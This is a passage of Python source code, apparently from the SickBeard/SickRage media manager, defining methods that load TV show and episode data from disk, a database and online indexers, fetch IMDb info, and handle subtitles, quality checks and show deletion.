find all media files in the show folder and create episodes for as many as possible def loadEpisodesFromDir(self): if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + u": Show dir doesn't exist, not loading episodes from disk", logger.DEBUG) return logger.log(str(self.indexerid) + u": Loading all episodes from the show directory " + self._location, logger.DEBUG) # get file list mediaFiles = helpers.listMediaFiles(self._location) logger.log(u"%s: Found files: %s" % (self.indexerid, mediaFiles), logger.DEBUG) # create TVEpisodes from each media file (if possible) sql_l = [] for mediaFile in mediaFiles: parse_result = None curEpisode = None logger.log(str(self.indexerid) + u": Creating episode from " + mediaFile, logger.DEBUG) try: curEpisode = self.makeEpFromFile(ek.ek(os.path.join, self._location, mediaFile)) except (exceptions.ShowNotFoundException, exceptions.EpisodeNotFoundException), e: logger.log(u"Episode " + mediaFile + " returned an exception: " + ex(e), logger.ERROR) continue except exceptions.EpisodeDeletedException: logger.log(u"The episode deleted itself when I tried making an object for it", logger.DEBUG) if curEpisode is None: continue # see if we should save the release name in the db ep_file_name = ek.ek(os.path.basename, curEpisode.location) ep_file_name = ek.ek(os.path.splitext, ep_file_name)[0] try: parse_result = None np = NameParser(False, showObj=self, tryIndexers=True) parse_result = np.parse(ep_file_name) except (InvalidNameException, InvalidShowException): pass if not ' ' in ep_file_name and parse_result and parse_result.release_group: logger.log( u"Name " + ep_file_name + u" gave release group of " + parse_result.release_group + ", seems valid", logger.DEBUG) curEpisode.release_name = ep_file_name # store the reference in the show if curEpisode != None: if self.subtitles: try: curEpisode.refreshSubtitles() except: logger.log("%s: Could not refresh subtitles" % self.indexerid, logger.ERROR) logger.log(traceback.format_exc(), logger.DEBUG) sql_l.append(curEpisode.get_sql()) if sql_l: myDB = db.DBConnection() myDB.mass_action(sql_l) def loadEpisodesFromDB(self): logger.log(u"Loading all episodes from the DB", logger.DEBUG) myDB = db.DBConnection() sql = "SELECT * FROM tv_episodes WHERE showid = ?" sqlResults = myDB.select(sql, [self.indexerid]) scannedEps = {} lINDEXER_API_PARMS = sickbeard.indexerApi(self.indexer).api_params.copy() if self.lang: lINDEXER_API_PARMS['language'] = self.lang logger.log(u"Using language: " + str(self.lang), logger.DEBUG) if self.dvdorder != 0: lINDEXER_API_PARMS['dvdorder'] = True logger.log(u"lINDEXER_API_PARMS: " + str(lINDEXER_API_PARMS), logger.DEBUG) t = sickbeard.indexerApi(self.indexer).indexer(**lINDEXER_API_PARMS) cachedShow = t[self.indexerid] cachedSeasons = {} for curResult in sqlResults: logger.log(u"loadEpisodesFromDB curResult: " + str(curResult), logger.DEBUG) deleteEp = False curSeason = int(curResult["season"]) curEpisode = int(curResult["episode"]) if curSeason not in cachedSeasons: try: cachedSeasons[curSeason] = cachedShow[curSeason] except sickbeard.indexer_seasonnotfound, e: logger.log(u"Error when trying to load the episode from " + sickbeard.indexerApi( self.indexer).name + ": " + e.message, logger.WARNING) deleteEp = True if not curSeason in scannedEps: logger.log(u"Not curSeason in scannedEps", logger.DEBUG) scannedEps[curSeason] = {} logger.log(u"Loading episode S%02dE%02d from the DB" % (curSeason, curEpisode), logger.DEBUG) try: curEp = self.getEpisode(curSeason, curEpisode) if not curEp: raise exceptions.EpisodeNotFoundException # if we found out that the ep is no longer on TVDB then delete it from our database too if deleteEp: curEp.deleteEpisode() curEp.loadFromDB(curSeason, curEpisode) curEp.loadFromIndexer(tvapi=t, cachedSeason=cachedSeasons[curSeason]) scannedEps[curSeason][curEpisode] = True except exceptions.EpisodeDeletedException: logger.log(u"Tried loading an episode from the DB that should have been deleted, skipping it", logger.DEBUG) continue logger.log(u"Finished loading all episodes from the DB", logger.DEBUG) return scannedEps def loadEpisodesFromIndexer(self, cache=True): lINDEXER_API_PARMS = sickbeard.indexerApi(self.indexer).api_params.copy() if not cache: lINDEXER_API_PARMS['cache'] = False if self.lang: lINDEXER_API_PARMS['language'] = self.lang if self.dvdorder != 0: lINDEXER_API_PARMS['dvdorder'] = True try: t = sickbeard.indexerApi(self.indexer).indexer(**lINDEXER_API_PARMS) showObj = t[self.indexerid] except sickbeard.indexer_error: logger.log(u"" + sickbeard.indexerApi( self.indexer).name + " timed out, unable to update episodes from " + sickbeard.indexerApi( self.indexer).name, logger.WARNING) return None logger.log( str(self.indexerid) + u": Loading all episodes from " + sickbeard.indexerApi(self.indexer).name + "..", logger.DEBUG) scannedEps = {} sql_l = [] for season in showObj: scannedEps[season] = {} for episode in showObj[season]: # need some examples of wtf episode 0 means to decide if we want it or not if episode == 0: continue try: ep = self.getEpisode(season, episode) if not ep: raise exceptions.EpisodeNotFoundException except exceptions.EpisodeNotFoundException: logger.log("%s: %s object for S%02dE%02d is incomplete, skipping this episode" % (self.indexerid, sickbeard.indexerApi(self.indexer).name, season, episode)) continue else: try: ep.loadFromIndexer(tvapi=t) except exceptions.EpisodeDeletedException: logger.log(u"The episode was deleted, skipping the rest of the load") continue with ep.lock: logger.log("%s: Loading info from %s for episode S%02dE%02d" % (self.indexerid, sickbeard.indexerApi(self.indexer).name, season, episode),logger.DEBUG) ep.loadFromIndexer(season, episode, tvapi=t) sql_l.append(ep.get_sql()) scannedEps[season][episode] = True if len(sql_l) > 0: myDB = db.DBConnection() myDB.mass_action(sql_l) # Done updating save last update date self.last_update_indexer = datetime.date.today().toordinal() self.saveToDB() return scannedEps def getImages(self, fanart=None, poster=None): fanart_result = poster_result = banner_result = False season_posters_result = season_banners_result = season_all_poster_result = season_all_banner_result = False for cur_provider in sickbeard.metadata_provider_dict.values(): # FIXME: Needs to not show this message if the option is not enabled? logger.log(u"Running metadata routines for " + cur_provider.name, logger.DEBUG) fanart_result = cur_provider.create_fanart(self) or fanart_result poster_result = cur_provider.create_poster(self) or poster_result banner_result = cur_provider.create_banner(self) or banner_result season_posters_result = cur_provider.create_season_posters(self) or season_posters_result season_banners_result = cur_provider.create_season_banners(self) or season_banners_result season_all_poster_result = cur_provider.create_season_all_poster(self) or season_all_poster_result season_all_banner_result = cur_provider.create_season_all_banner(self) or season_all_banner_result return fanart_result or poster_result or banner_result or season_posters_result or season_banners_result or season_all_poster_result or season_all_banner_result # make a TVEpisode object from a media file def makeEpFromFile(self, file): if not ek.ek(os.path.isfile, file): logger.log(str(self.indexerid) + u": That isn't even a real file dude... " + file) return None logger.log(str(self.indexerid) + u": Creating episode object from " + file, logger.DEBUG) try: myParser = NameParser(showObj=self, tryIndexers=True) parse_result = myParser.parse(file) except InvalidNameException: logger.log(u"Unable to parse the filename " + file + " into a valid episode", logger.DEBUG) return None except InvalidShowException: logger.log(u"Unable to parse the filename " + file + " into a valid show", logger.DEBUG) return None if not len(parse_result.episode_numbers): logger.log("parse_result: " + str(parse_result)) logger.log(u"No episode number found in " + file + ", ignoring it", logger.WARNING) return None # for now lets assume that any episode in the show dir belongs to that show season = parse_result.season_number if parse_result.season_number != None else 1 episodes = parse_result.episode_numbers rootEp = None sql_l = [] for curEpNum in episodes: episode = int(curEpNum) logger.log("%s: %s parsed to %s S%02dE%02d" % (self.indexerid, file, self.name, season, episode), logger.DEBUG) checkQualityAgain = False same_file = False curEp = self.getEpisode(season, episode) if not curEp: try: curEp = self.getEpisode(season, episode, file) if not curEp: raise exceptions.EpisodeNotFoundException except exceptions.EpisodeNotFoundException: logger.log(str(self.indexerid) + u": Unable to figure out what this file is, skipping", logger.ERROR) continue else: # if there is a new file associated with this ep then re-check the quality if curEp.location and ek.ek(os.path.normpath, curEp.location) != ek.ek(os.path.normpath, file): logger.log( u"The old episode had a different file associated with it, I will re-check the quality based on the new filename " + file, logger.DEBUG) checkQualityAgain = True with curEp.lock: old_size = curEp.file_size curEp.location = file # if the sizes are the same then it's probably the same file if old_size and curEp.file_size == old_size: same_file = True else: same_file = False curEp.checkForMetaFiles() if rootEp == None: rootEp = curEp else: if curEp not in rootEp.relatedEps: with rootEp.lock: rootEp.relatedEps.append(curEp) # if it's a new file then if not same_file: with curEp.lock: curEp.release_name = '' # if they replace a file on me I'll make some attempt at re-checking the quality unless I know it's the same file if checkQualityAgain and not same_file: newQuality = Quality.nameQuality(file, self.is_anime) logger.log(u"Since this file has been renamed, I checked " + file + " and found quality " + Quality.qualityStrings[newQuality], logger.DEBUG) if newQuality != Quality.UNKNOWN: with curEp.lock: curEp.status = Quality.compositeStatus(DOWNLOADED, newQuality) # check for status/quality changes as long as it's a new file elif not same_file and sickbeard.helpers.isMediaFile(file) and curEp.status not in Quality.DOWNLOADED + [ ARCHIVED, IGNORED]: oldStatus, oldQuality = Quality.splitCompositeStatus(curEp.status) newQuality = Quality.nameQuality(file, self.is_anime) if newQuality == Quality.UNKNOWN: newQuality = Quality.assumeQuality(file) newStatus = None # if it was snatched and now exists then set the status correctly if oldStatus == SNATCHED and oldQuality <= newQuality: logger.log(u"STATUS: this ep used to be snatched with quality " + Quality.qualityStrings[ oldQuality] + u" but a file exists with quality " + Quality.qualityStrings[ newQuality] + u" so I'm setting the status to DOWNLOADED", logger.DEBUG) newStatus = DOWNLOADED # if it was snatched proper and we found a higher quality one then allow the status change elif oldStatus == SNATCHED_PROPER and oldQuality < newQuality: logger.log(u"STATUS: this ep used to be snatched proper with quality " + Quality.qualityStrings[ oldQuality] + u" but a file exists with quality " + Quality.qualityStrings[ newQuality] + u" so I'm setting the status to DOWNLOADED", logger.DEBUG) newStatus = DOWNLOADED elif oldStatus not in (SNATCHED, SNATCHED_PROPER): newStatus = DOWNLOADED if newStatus is not None: with curEp.lock: logger.log(u"STATUS: we have an associated file, so setting the status from " + str( curEp.status) + u" to DOWNLOADED/" + str(Quality.statusFromName(file, anime=self.is_anime)), logger.DEBUG) curEp.status = Quality.compositeStatus(newStatus, newQuality) with curEp.lock: sql_l.append(curEp.get_sql()) if len(sql_l) > 0: myDB = db.DBConnection() myDB.mass_action(sql_l) # creating metafiles on the root should be good enough if rootEp: with rootEp.lock: rootEp.createMetaFiles() return rootEp def loadFromDB(self, skipNFO=False): logger.log(str(self.indexerid) + u": Loading show info from database", logger.DEBUG) myDB = db.DBConnection() sqlResults = myDB.select("SELECT * FROM tv_shows WHERE indexer_id = ?", [self.indexerid]) if len(sqlResults) > 1: raise exceptions.MultipleDBShowsException() elif len(sqlResults) == 0: logger.log(str(self.indexerid) + ": Unable to find the show in the database") return else: self.indexer = int(sqlResults[0]["indexer"] or 0) if not self.name: self.name = sqlResults[0]["show_name"] if not self.network: self.network = sqlResults[0]["network"] if not self.genre: self.genre = sqlResults[0]["genre"] if not self.classification: self.classification = sqlResults[0]["classification"] self.runtime = sqlResults[0]["runtime"] self.status = sqlResults[0]["status"] if self.status is None: self.status = "Unknown" self.airs = sqlResults[0]["airs"] if self.airs is None: self.airs = "" self.startyear = int(sqlResults[0]["startyear"] or 0) self.air_by_date = int(sqlResults[0]["air_by_date"] or 0) self.anime = int(sqlResults[0]["anime"] or 0) self.sports = int(sqlResults[0]["sports"] or 0) self.scene = int(sqlResults[0]["scene"] or 0) self.subtitles = int(sqlResults[0]["subtitles"] or 0) self.dvdorder = int(sqlResults[0]["dvdorder"] or 0) self.archive_firstmatch = int(sqlResults[0]["archive_firstmatch"] or 0) self.quality = int(sqlResults[0]["quality"] or UNKNOWN) self.flatten_folders = int(sqlResults[0]["flatten_folders"] or 0) self.paused = int(sqlResults[0]["paused"] or 0) try: self.location = sqlResults[0]["location"] except Exception: dirty_setter("_location")(self, sqlResults[0]["location"]) self._isDirGood = False if not self.lang: self.lang = sqlResults[0]["lang"] self.last_update_indexer = sqlResults[0]["last_update_indexer"] self.rls_ignore_words = sqlResults[0]["rls_ignore_words"] self.rls_require_words = sqlResults[0]["rls_require_words"] self.default_ep_status = int(sqlResults[0]["default_ep_status"] or SKIPPED) if not self.imdbid: self.imdbid = sqlResults[0]["imdb_id"] if self.is_anime: self.release_groups = BlackAndWhiteList(self.indexerid) # Get IMDb_info from database myDB = db.DBConnection() sqlResults = myDB.select("SELECT * FROM imdb_info WHERE indexer_id = ?", [self.indexerid]) if len(sqlResults) == 0: logger.log(str(self.indexerid) + ": Unable to find IMDb show info in the database") return else: self.imdb_info = dict(zip(sqlResults[0].keys(), sqlResults[0])) self.dirty = False return True def loadFromIndexer(self, cache=True, tvapi=None, cachedSeason=None): if self.indexer is not INDEXER_TVRAGE: logger.log(str(self.indexerid) + u": Loading show info from " + sickbeard.indexerApi(self.indexer).name, logger.DEBUG) # There's gotta be a better way of doing this but we don't wanna # change the cache value elsewhere if tvapi is None: lINDEXER_API_PARMS = sickbeard.indexerApi(self.indexer).api_params.copy() if not cache: lINDEXER_API_PARMS['cache'] = False if self.lang: lINDEXER_API_PARMS['language'] = self.lang if self.dvdorder != 0: lINDEXER_API_PARMS['dvdorder'] = True t = sickbeard.indexerApi(self.indexer).indexer(**lINDEXER_API_PARMS) else: t = tvapi myEp = t[self.indexerid] try: self.name = myEp['seriesname'].strip() except AttributeError: raise sickbeard.indexer_attributenotfound( "Found %s, but attribute 'seriesname' was empty." % (self.indexerid)) self.classification = getattr(myEp, 'classification', 'Scripted') self.genre = getattr(myEp, 'genre', '') self.network = getattr(myEp, 'network', '') self.runtime = getattr(myEp, 'runtime', '') self.imdbid = getattr(myEp, 'imdb_id', '') if getattr(myEp, 'airs_dayofweek', None) is not None and getattr(myEp, 'airs_time', None) is not None: self.airs = myEp["airs_dayofweek"] + " " + myEp["airs_time"] if self.airs is None: self.airs = '' if getattr(myEp, 'firstaired', None) is not None: self.startyear = int(str(myEp["firstaired"]).split('-')[0]) self.status = getattr(myEp, 'status', 'Unknown') else: logger.log(str(self.indexerid) + u": NOT loading info from " + sickbeard.indexerApi(self.indexer).name + " as it is temporarily disabled.", logger.WARNING) def loadIMDbInfo(self, imdbapi=None): imdb_info = {'imdb_id': self.imdbid, 'title': '', 'year': '', 'akas': [], 'runtimes': '', 'genres': [], 'countries': '', 'country_codes': [], 'certificates': [], 'rating': '', 'votes': '', 'last_update': '' } i = imdb.IMDb() if not self.imdbid: self.imdbid = i.title2imdbID(self.name, kind='tv series') if self.imdbid: logger.log(str(self.indexerid) + u": Loading show info from IMDb", logger.DEBUG) imdbTv = i.get_movie(str(re.sub("[^0-9]", "", self.imdbid))) for key in filter(lambda x: x.replace('_', ' ') in imdbTv.keys(), imdb_info.keys()): # Store only the first value for string type if type(imdb_info[key]) == type('') and type(imdbTv.get(key)) == type([]): imdb_info[key] = imdbTv.get(key.replace('_', ' '))[0] else: imdb_info[key] = imdbTv.get(key.replace('_', ' ')) # Filter only the value if imdb_info['runtimes']: imdb_info['runtimes'] = re.search('\d+', imdb_info['runtimes']).group(0) else: imdb_info['runtimes'] = self.runtime if imdb_info['akas']: imdb_info['akas'] = '|'.join(imdb_info['akas']) else: imdb_info['akas'] = '' # Join all genres in a string if imdb_info['genres']: imdb_info['genres'] = '|'.join(imdb_info['genres']) else: imdb_info['genres'] = '' # Get only the production country certificate if any if imdb_info['certificates'] and imdb_info['countries']: dct = {} try: for item in imdb_info['certificates']: dct[item.split(':')[0]] = item.split(':')[1] imdb_info['certificates'] = dct[imdb_info['countries']] except: imdb_info['certificates'] = '' else: imdb_info['certificates'] = '' if imdb_info['country_codes']: imdb_info['country_codes'] = '|'.join(imdb_info['country_codes']) else: imdb_info['country_codes'] = '' imdb_info['last_update'] = datetime.date.today().toordinal() # Rename dict keys without spaces for DB upsert self.imdb_info = dict( (k.replace(' ', '_'), k(v) if hasattr(v, 'keys') else v) for k, v in imdb_info.iteritems()) logger.log(str(self.indexerid) + u": Obtained info from IMDb ->" + str(self.imdb_info), logger.DEBUG) def nextEpisode(self): logger.log(str(self.indexerid) + ": Finding the episode which airs next", logger.DEBUG) curDate = datetime.date.today().toordinal() if not self.nextaired or self.nextaired and curDate > self.nextaired: myDB = db.DBConnection() sqlResults = myDB.select( "SELECT airdate, season, episode FROM tv_episodes WHERE showid = ? AND airdate >= ? AND status IN (?,?) ORDER BY airdate ASC LIMIT 1", [self.indexerid, datetime.date.today().toordinal(), UNAIRED, WANTED]) if sqlResults == None or len(sqlResults) == 0: logger.log(str(self.indexerid) + u": No episode found... need to implement a show status", logger.DEBUG) self.nextaired = "" else: logger.log(u"%s: Found episode S%02dE%02d" % (self.indexerid, sqlResults[0]["season"], sqlResults[0]["episode"] ) , logger.DEBUG) self.nextaired = sqlResults[0]['airdate'] return self.nextaired def deleteShow(self, full=False): sql_l = [["DELETE FROM tv_episodes WHERE showid = ?", [self.indexerid]], ["DELETE FROM tv_shows WHERE indexer_id = ?", [self.indexerid]], ["DELETE FROM imdb_info WHERE indexer_id = ?", [self.indexerid]], ["DELETE FROM xem_refresh WHERE indexer_id = ?", [self.indexerid]], ["DELETE FROM scene_numbering WHERE indexer_id = ?", [self.indexerid]]] myDB = db.DBConnection() myDB.mass_action(sql_l) action = ('delete', 'trash')[sickbeard.TRASH_REMOVE_SHOW] # remove self from show list sickbeard.showList = [x for x in sickbeard.showList if int(x.indexerid) != self.indexerid] # clear the cache image_cache_dir = ek.ek(os.path.join, sickbeard.CACHE_DIR, 'images') for cache_file in ek.ek(glob.glob, ek.ek(os.path.join, image_cache_dir, str(self.indexerid) + '.*')): logger.log(u'Attempt to %s cache file %s' % (action, cache_file)) try: if sickbeard.TRASH_REMOVE_SHOW: send2trash(cache_file) else: os.remove(cache_file) except OSError, e: logger.log(u'Unable to %s %s: %s / %s' % (action, cache_file, repr(e), str(e)), logger.WARNING) # remove entire show folder if full: try: logger.log(u'Attempt to %s show folder %s' % (action, self._location)) # check first the read-only attribute file_attribute = ek.ek(os.stat, self.location)[0] if (not file_attribute & stat.S_IWRITE): # File is read-only, so make it writeable logger.log('Attempting to make writeable the read only folder %s' % self._location, logger.DEBUG) try: ek.ek(os.chmod, self.location, stat.S_IWRITE) except: logger.log(u'Unable to change permissions of %s' % self._location, logger.WARNING) if sickbeard.TRASH_REMOVE_SHOW: send2trash(self.location) else: ek.ek(shutil.rmtree, self.location) logger.log(u'%s show folder %s' % (('Deleted', 'Trashed')[sickbeard.TRASH_REMOVE_SHOW], self._location)) except exceptions.ShowDirNotFoundException: logger.log(u"Show folder does not exist, no need to %s %s" % (action, self._location), logger.WARNING) except OSError, e: logger.log(u'Unable to %s %s: %s / %s' % (action, self._location, repr(e), str(e)), logger.WARNING) if sickbeard.USE_TRAKT and sickbeard.TRAKT_SYNC_WATCHLIST: logger.log(u"Removing show: indexerid " + str(self.indexerid) + ", Title " + str(self.name) + " from Watchlist", logger.DEBUG) notifiers.trakt_notifier.update_watchlist(self, update="remove") def populateCache(self): cache_inst = image_cache.ImageCache() logger.log(u"Checking & filling cache for show " + self.name, logger.DEBUG) cache_inst.fill_cache(self) def refreshDir(self): # make sure the show dir is where we think it is unless dirs are created on the fly if not ek.ek(os.path.isdir, self._location) and not sickbeard.CREATE_MISSING_SHOW_DIRS: return False # load from dir self.loadEpisodesFromDir() # run through all locations from DB, check that they exist logger.log(str(self.indexerid) + u": Loading all episodes with a location from the database", logger.DEBUG) myDB = db.DBConnection() sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND location != ''", [self.indexerid]) sql_l = [] for ep in sqlResults: curLoc = os.path.normpath(ep["location"]) season = int(ep["season"]) episode = int(ep["episode"]) try: curEp = self.getEpisode(season, episode) if not curEp: raise exceptions.EpisodeDeletedException except exceptions.EpisodeDeletedException: logger.log(u"The episode was deleted while we were refreshing it, moving on to the next one", logger.DEBUG) continue # if the path doesn't exist or if it's not in our show dir if not ek.ek(os.path.isfile, curLoc) or not os.path.normpath(curLoc).startswith( os.path.normpath(self.location)): # check if downloaded files still exist, update our data if this has changed if not sickbeard.SKIP_REMOVED_FILES: with curEp.lock: # if it used to have a file associated with it and it doesn't anymore then set it to sickbeard.EP_DEFAULT_DELETED_STATUS if curEp.location and curEp.status in Quality.DOWNLOADED: logger.log(u"%s: Location for S%02dE%02d doesn't exist, removing it and changing our status to %s" % (self.indexerid, season, episode, statusStrings[sickbeard.EP_DEFAULT_DELETED_STATUS]) ,logger.DEBUG) curEp.status = sickbeard.EP_DEFAULT_DELETED_STATUS curEp.subtitles = list() curEp.subtitles_searchcount = 0 curEp.subtitles_lastsearch = str(datetime.datetime.min) curEp.location = '' curEp.hasnfo = False curEp.hastbn = False curEp.release_name = '' sql_l.append(curEp.get_sql()) else: # the file exists, set its modify file stamp if sickbeard.AIRDATE_EPISODES: with curEp.lock: curEp.airdateModifyStamp() if sql_l: myDB = db.DBConnection() myDB.mass_action(sql_l) def downloadSubtitles(self, force=False): # TODO: Add support for force option if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + ": Show dir doesn't exist, can't download subtitles", logger.DEBUG) return logger.log("%s: Downloading subtitles" % self.indexerid, logger.DEBUG) try: episodes = self.getAllEpisodes(has_location=True) if not episodes: logger.log("%s: No episodes to download subtitles for %s" % (self.indexerid, self.name), logger.DEBUG) return for episode in episodes: episode.downloadSubtitles(force=force) except Exception: logger.log("%s: Error occurred when downloading subtitles for %s" % (self.indexerid, self.name), logger.DEBUG) logger.log(traceback.format_exc(), logger.ERROR) def saveToDB(self, forceSave=False): if not self.dirty and not forceSave: logger.log(str(self.indexerid) + ": Not saving show to db - record is not dirty", logger.DEBUG) return logger.log(str(self.indexerid) + u": Saving show info to database", logger.DEBUG) controlValueDict = {"indexer_id": self.indexerid} newValueDict = {"indexer": self.indexer, "show_name": self.name, "location": self._location, "network": self.network, "genre": self.genre, "classification": self.classification, "runtime": self.runtime, "quality": self.quality, "airs": self.airs, "status": self.status, "flatten_folders": self.flatten_folders, "paused": self.paused, "air_by_date": self.air_by_date, "anime": self.anime, "scene": self.scene, "sports": self.sports, "subtitles": self.subtitles, "dvdorder": self.dvdorder, "archive_firstmatch": self.archive_firstmatch, "startyear": self.startyear, "lang": self.lang, "imdb_id": self.imdbid, "last_update_indexer": self.last_update_indexer, "rls_ignore_words": self.rls_ignore_words, "rls_require_words": self.rls_require_words, "default_ep_status": self.default_ep_status } myDB = db.DBConnection() myDB.upsert("tv_shows", newValueDict, controlValueDict) helpers.update_anime_support() if self.imdbid: controlValueDict = {"indexer_id": self.indexerid} newValueDict = self.imdb_info myDB = db.DBConnection() myDB.upsert("imdb_info", newValueDict, controlValueDict) def __str__(self): toReturn = "" toReturn += "indexerid: " + str(self.indexerid) + "\n" toReturn += "indexer: " + str(self.indexer) + "\n" toReturn += "name: " + self.name + "\n" toReturn += "location: " + self._location + "\n" if self.network: toReturn += "network: " + self.network + "\n" if self.airs: toReturn += "airs: " + self.airs + "\n" toReturn += "status: " + self.status + "\n" toReturn += "startyear: " + str(self.startyear) + "\n" if self.genre: toReturn += "genre: " + self.genre + "\n" toReturn += "classification: " + self.classification + "\n" toReturn += "runtime: " + str(self.runtime) + "\n" toReturn += "quality: " + str(self.quality) + "\n" toReturn += "scene: " + str(self.is_scene) + "\n" toReturn += "sports: " + str(self.is_sports) + "\n" toReturn += "anime: " + str(self.is_anime) + "\n" return toReturn def qualitiesToString(self, qualities=[]): result = u'' for quality in qualities: if Quality.qualityStrings.has_key(quality): result += Quality.qualityStrings[quality] + u', ' else: logger.log(u"Bad quality value: " + str(quality)) result = re.sub(', $', '', result) if not len(result): result = u'None' return result def wantEpisode(self, season, episode, quality, manualSearch=False, downCurQuality=False): logger.log(u"Checking if found episode %s S%02dE%02d is wanted at quality %s" % (self.name, season, episode, Quality.qualityStrings[quality]) , logger.DEBUG) # if the quality isn't one we want under any circumstances then just say no anyQualities, bestQualities = Quality.splitQuality(self.quality) logger.log(u"Any,Best = [ %s ] [ %s ] Found = [ %s ]" % (self.qualitiesToString(anyQualities), self.qualitiesToString(bestQualities), self.qualitiesToString([quality])), logger.DEBUG) if quality not in anyQualities + bestQualities: logger.log(u"Don't want this quality, ignoring found episode", logger.DEBUG) return False myDB = db.DBConnection() sqlResults = myDB.select("SELECT status FROM tv_episodes WHERE showid = ? AND season = ? AND episode = ?", [self.indexerid, season, episode]) if not sqlResults or not len(sqlResults): logger.log(u"Unable to find a matching episode in database, ignoring found episode", logger.DEBUG) return False epStatus = int(sqlResults[0]["status"]) epStatus_text = statusStrings[epStatus] logger.log(u"Existing episode status: " + str(epStatus) + " (" + epStatus_text + ")", logger.DEBUG) # if we know we don't want it then just say no if epStatus in (UNAIRED, SKIPPED, IGNORED, ARCHIVED) and not manualSearch: logger.log(u"Existing episode status is unaired/skipped/ignored/archived, ignoring found episode", logger.DEBUG) return False curStatus, curQuality = Quality.splitCompositeStatus(epStatus) # if it's one of these then we want it as long as it's in our allowed initial qualities if quality in anyQualities + bestQualities: if epStatus in (WANTED, SKIPPED): logger.log(u"Existing episode status is wanted or skipped, getting found episode", logger.DEBUG) return True elif manualSearch: if (downCurQuality and quality >= curQuality) or (not downCurQuality and quality > curQuality): logger.log( u"Usually ignoring found episode, but forced search allows the quality, getting found episode", logger.DEBUG) return True else: logger.log(u"Quality is on wanted list, need to check if it's better than existing quality", logger.DEBUG) # if we are re-downloading then we only want it if it's in our bestQualities list and better than what we have, or we only have one bestQuality and we do not have that quality yet if curStatus in Quality.DOWNLOADED + Quality.SNATCHED + Quality.SNATCHED_PROPER and quality in bestQualities and (quality > curQuality or curQuality not in bestQualities): logger.log(u"Episode already exists but the found episode quality is wanted more, getting found episode", logger.DEBUG) return True elif curStatus == Quality.UNKNOWN and manualSearch: logger.log(u"Episode already exists but quality is Unknown, getting found episode", logger.DEBUG) return True else: logger.log(u"Episode already exists and the found episode has same/lower quality, ignoring found episode", logger.DEBUG) logger.log(u"None of the conditions were met, ignoring found episode", logger.DEBUG) return False def getOverview(self, epStatus): if epStatus == WANTED: return Overview.WANTED elif epStatus in (UNAIRED, UNKNOWN): return Overview.UNAIRED elif epStatus in (SKIPPED, IGNORED): return Overview.SKIPPED elif epStatus == ARCHIVED: return Overview.GOOD elif epStatus in Quality.DOWNLOADED + Quality.SNATCHED + Quality.SNATCHED_PROPER + Quality.FAILED + Quality.SNATCHED_BEST + Quality.ARCHIVED: anyQualities, bestQualities = Quality.splitQuality(self.quality) # @UnusedVariable if bestQualities: maxBestQuality = max(bestQualities) minBestQuality = min(bestQualities) else: maxBestQuality = None minBestQuality = None epStatus, curQuality = Quality.splitCompositeStatus(epStatus) if epStatus == FAILED: return Overview.WANTED if epStatus == DOWNLOADED and curQuality == Quality.UNKNOWN: return Overview.QUAL elif epStatus in (SNATCHED, SNATCHED_PROPER, SNATCHED_BEST): return Overview.SNATCHED # if they don't want re-downloads then we call it good if they have anything elif maxBestQuality == None: return Overview.GOOD # if the want only first match and already have one call it good elif self.archive_firstmatch and curQuality in bestQualities: return Overview.GOOD # if they want only first match and current quality is higher than minimal best quality call it good elif self.archive_firstmatch and minBestQuality != None and curQuality > minBestQuality: return Overview.GOOD # if they have one but it's not the best they want then mark it as qual elif curQuality < maxBestQuality: return Overview.QUAL # if it's >= maxBestQuality then it's good else: return Overview.GOOD def __getstate__(self): d = dict(self.__dict__) del d['lock'] return d def __setstate__(self, d): d['lock'] = threading.Lock() self.__dict__.update(d) class TVEpisode(object): def __init__(self, show, season, episode, file=""): self._name = "" self._season = season self._episode = episode self._absolute_number = 0 self._description = "" self._subtitles = list() self._subtitles_searchcount = 0 self._subtitles_lastsearch = str(datetime.datetime.min) self._airdate = datetime.date.fromordinal(1) self._hasnfo = False self._hastbn = False self._status = UNKNOWN self._indexerid = 0 self._file_size = 0 self._release_name = '' self._is_proper = False self._version = 0 self._release_group = '' # setting any of the above sets the dirty flag self.dirty = True self.show = show self.scene_season = 0 self.scene_episode = 0 self.scene_absolute_number = 0 self._location = file self._indexer = int(self.show.indexer) self.lock = threading.Lock() self.specifyEpisode(self.season, self.episode) self.relatedEps = [] self.checkForMetaFiles() self.wantedQuality = [] name = property(lambda self: self._name, dirty_setter("_name")) season = property(lambda self: self._season, dirty_setter("_season")) episode = property(lambda self: self._episode, dirty_setter("_episode")) absolute_number = property(lambda self: self._absolute_number, dirty_setter("_absolute_number")) description = property(lambda self: self._description, dirty_setter("_description")) subtitles = property(lambda self: self._subtitles, dirty_setter("_subtitles")) subtitles_searchcount = property(lambda self: self._subtitles_searchcount, dirty_setter("_subtitles_searchcount")) subtitles_lastsearch = property(lambda self: self._subtitles_lastsearch, dirty_setter("_subtitles_lastsearch")) airdate = property(lambda self: self._airdate, dirty_setter("_airdate")) hasnfo = property(lambda self: self._hasnfo, dirty_setter("_hasnfo")) hastbn = property(lambda self: self._hastbn, dirty_setter("_hastbn")) status = property(lambda self: self._status, dirty_setter("_status")) indexer = property(lambda self: self._indexer, dirty_setter("_indexer")) indexerid = property(lambda self: self._indexerid, dirty_setter("_indexerid")) # location = property(lambda self: self._location, dirty_setter("_location")) file_size = property(lambda self: self._file_size, dirty_setter("_file_size")) release_name = property(lambda self: self._release_name, dirty_setter("_release_name")) is_proper = property(lambda self: self._is_proper, dirty_setter("_is_proper")) version = property(lambda self: self._version, dirty_setter("_version")) release_group = property(lambda self: self._release_group, dirty_setter("_release_group")) def _set_location(self, new_location): logger.log(u"Setter sets location to " + new_location, logger.DEBUG) # self._location = newLocation dirty_setter("_location")(self, new_location) if new_location and ek.ek(os.path.isfile, new_location): self.file_size = ek.ek(os.path.getsize, new_location) else: self.file_size = 0 location = property(lambda self: self._location, _set_location) def refreshSubtitles(self): """Look for subtitles files and refresh the subtitles property""" self.subtitles = subtitles.subtitlesLanguages(self.location) def downloadSubtitles(self, force=False): if not ek.ek(os.path.isfile, self.location): logger.log(u"%s: Episode file doesn't exist, can't download subtitles for S%02dE%02d" % (self.show.indexerid, self.season, self.episode), logger.DEBUG) return logger.log(u"%s: Downloading subtitles for S%02dE%02d" % (self.show.indexerid, self.season, self.episode), logger.DEBUG) previous_subtitles = self.subtitles #logging.getLogger('subliminal.api').addHandler(logging.StreamHandler()) #logging.getLogger('subliminal.api').setLevel(logging.DEBUG) 